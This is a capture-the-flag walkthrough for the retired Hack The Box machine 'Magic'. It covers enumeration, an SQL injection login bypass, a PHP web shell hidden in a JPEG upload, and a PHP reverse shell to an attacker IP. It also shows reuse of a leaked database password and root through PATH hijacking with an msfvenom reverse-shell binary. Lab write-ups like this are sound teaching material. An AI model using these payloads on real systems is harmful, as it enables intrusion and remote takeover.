
Summary
Magic is a Linux box of medium difficulty from Hack The Box platform that was retired at 22 August 2020 at 19:00:00 UTC. This box offers interesting attack vectors to exploit like SQL Injection, PHP code injection into image file and more.
Scanning and Enumeration
After adding an entry in our /etc/hosts
file, we perform a typical scanning to check which ports are open.
$ports=$(sudo nmap -p- --min-rate=1000 -T4 magic.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$sudo nmap -p$ports -T4 -Pn -A magic.htb
This reveals an OpenSSH 7.6p1
server running on port 22 and Apache httpd 2.4.29
on port 80.
From the main page, we can see a login page pointing to http://magic.htb/login.php.

After some basic SQL Injection, it was found that this form is vulnerable to this kind of attack. We are able to bypass the authentication mechanism by injecting the following value into username
input field:
admin' AND 1234 = 1234 -- abc
Once logged in, we get access to a page that allows us to upload images to the website.
Getting a Foothold
Since we are now able to upload files to the server, our next goal should be upload a backdoor to it so we could interact with the system.
This stage was somewhat of trial and error, because the server performs some input validation on file upload. For instance, just sending a PHP file with double extension like backdoor.php.jpg
or simply tampering with HTTP Header won’t work.
One approach that works for this target is injecting PHP code into a JPEG image in order to exploit a flaw in the PHP-GD built-in function, imagecreatefromjpeg()
. This approach is better described here, and a tool to accomplish that can be found at https://github.com/dlegs/php-jpeg-injector.
Having an image to infect, run something like:
python gd-jpeg.py cat.jpg '<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>' magic-cat.php.jpg
After uploading magic-cat.php.jpg
to the server, we can run arbitrary commands passed as value to parameter cmd
, for instance:
http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=whoami.
To get a reverse shell from target to our machine, we could run
php -r '$sock=fsockopen("10.10.15.15",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Before we submit this command to our web shell though, we should encode it as follows:
$hURL -U -f urlOriginal file :: url
URL ENcoded :: php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
The final URL is then: http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
Sending this request to the server gives us a shell as user www-data
.
Owning User
With some basic filesystem enumeration, we can find a file named file.sql
containing the following line: INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
Besides, looking at either /home
directory or /etc/passwd
file, we see that there is a user called theseus
in the system.
Simply run su theseus
and provide the password Th3s3usW4sK1ng
to own user and get your flag: de****************************14
.
Owning System
By enumerating the system a little more, we can find a SUID binary file at /bin/sysinfo
for which we have execution permission. This is a compiled program that shows us some system information.
Running strings
on that file shows that it calls several system command line tools without specifying their full path. Thus, we can change our PATH
environment variable by adding /tmp
at the beginning and plant a malicious file in there with the same name as one of the tools called by sysinfo
.
For that task, we first create a payload with msfvenom
:
$msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.15 LPORT=5555 -f elf > free
Then, we upload this binary to target /tmp
directory and execute /bin/sysinfo
. Now, instead of the program executes the system free
command, which shows information about system memory, it will actually execute our malicious file placed at /tmp/free
, giving us a root shell.
Enjoy your root flag 76****************************5a
!